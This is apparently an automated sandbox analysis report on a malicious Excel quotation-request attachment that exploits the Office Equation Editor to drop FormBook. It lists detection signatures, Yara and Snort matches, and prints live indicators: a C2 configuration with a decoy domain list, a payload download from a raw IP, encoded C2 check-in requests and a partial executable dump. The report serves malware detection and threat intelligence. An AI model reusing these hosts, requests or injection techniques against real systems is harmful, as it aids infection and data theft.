Windows Analysis Report Quotation Request - Alligator Pty Ltd.xlsx

Overview

General Information

Sample Name: Quotation Request - Alligator Pty Ltd.xlsx
Analysis ID: 532880
MD5: 90e995ae2b06b84644586091a994f43a
SHA1: a6c83577fd947650a6b816fd910ebb7fd3464bca
SHA256: 1e8d78f614b82c1bdc730e745228b860d5b71888ac90efbf5d74af4ea3f876f9
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.dubaibiologicdentist.com/hf9j/"], "decoy": ["afrifarmgroup.com", "coffeeassiciation.com", "unlimit-ed.com", "guy.rest", "dnemperor.com", "ringstorule.com", "reelnasty.com", "travelgleam.com", "sagestyleresale.com", "jiaoyizhuan.club", "fastred.biz", "xn--fiqs8srv0ahj5a.xn--czru2d", "eden-foundation.com", "exquisite-epoxy-systems.com", "luxurycaroffer.com", "sdffzc.com", "suvsdealsonlinesearchdusorg.com", "weihaits.com", "fetch-us-mtg-refi.zone", "uterinevmkvhm.online", "redcarpetwithrob.online", "puertasautomaticassalceda.com", "blockchainsupport.global", "lalasushi.com", "picaworks.online", "airductcleaningindianapolis.net", "maximumdouglas.com", "bs2860.com", "pharmaceuticalmarking.com", "billionaireroyalties.com", "libertarias.wiki", "cupsnax.com", "koutarouserver.com", "crazydealeon.com", "amoraprimeirajogada.com", "fearlessfashionaccessories.biz", "ella.tech", "breackae.xyz", "hostmatadvice.com", "aestheticnursearie.com", "henryzingo.com", "folpro.com", "kooles.com", "rushingrofogg.xyz", "377techan.com", "sprookjesbosch.store", "newsymphonie.net", "lawswashington.com", "homesandhorses.net", "jacobalexandermusic.com", "ll1ysq.biz", "faceresurfacing.com", "thekeappro.com", "joycemalaysiaproperty.com", "traexcel.com", "subsoilcorp.com", "thejoannaha.com", "477karakabayrd.com", "bfcmtld.com", "kuratours.com", "group-place.com", "sixtreechina.com", "rattansagar.com", "ascenddronenews.com"]}
Multi AV Scanner detection for submitted file
Source: Quotation Request - Alligator Pty Ltd.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://107.173.191.75/dodge/winlogon.exe Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.msiexec.exe.29e796c.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.msiexec.exe.2a35f0.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.1e90000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C22 FindFirstFileA,FindClose, 4_2_00405C22
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.travelgleam.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C3F6
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_1_0040C3F6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then pop edi 7_2_0009C3F6
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 107.173.191.75:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 107.173.191.75:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.subsoilcorp.com
Source: C:\Windows\explorer.exe Domain query: www.travelgleam.com
Source: C:\Windows\explorer.exe Domain query: www.ll1ysq.biz
Source: C:\Windows\explorer.exe Network Connect: 162.210.195.97 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.dubaibiologicdentist.com/hf9j/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1Host: www.travelgleam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1Host: www.sdffzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 18:18:07 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.33Last-Modified: Thu, 02 Dec 2021 08:53:53 GMTETag: "7d5a3-5d225ee196c33"Accept-Ranges: bytesContent-Length: 513443Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 40 c5 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 40 c5 02 00 00 70 03 00 00 c6 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /dodge/winlogon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.191.75Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.191.75
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.500770240.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.493469713.0000000004399000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A24FD9.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.travelgleam.com
Source: global traffic HTTP traffic detected: GET /dodge/winlogon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.191.75Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1Host: www.travelgleam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1Host: www.sdffzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404E07

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
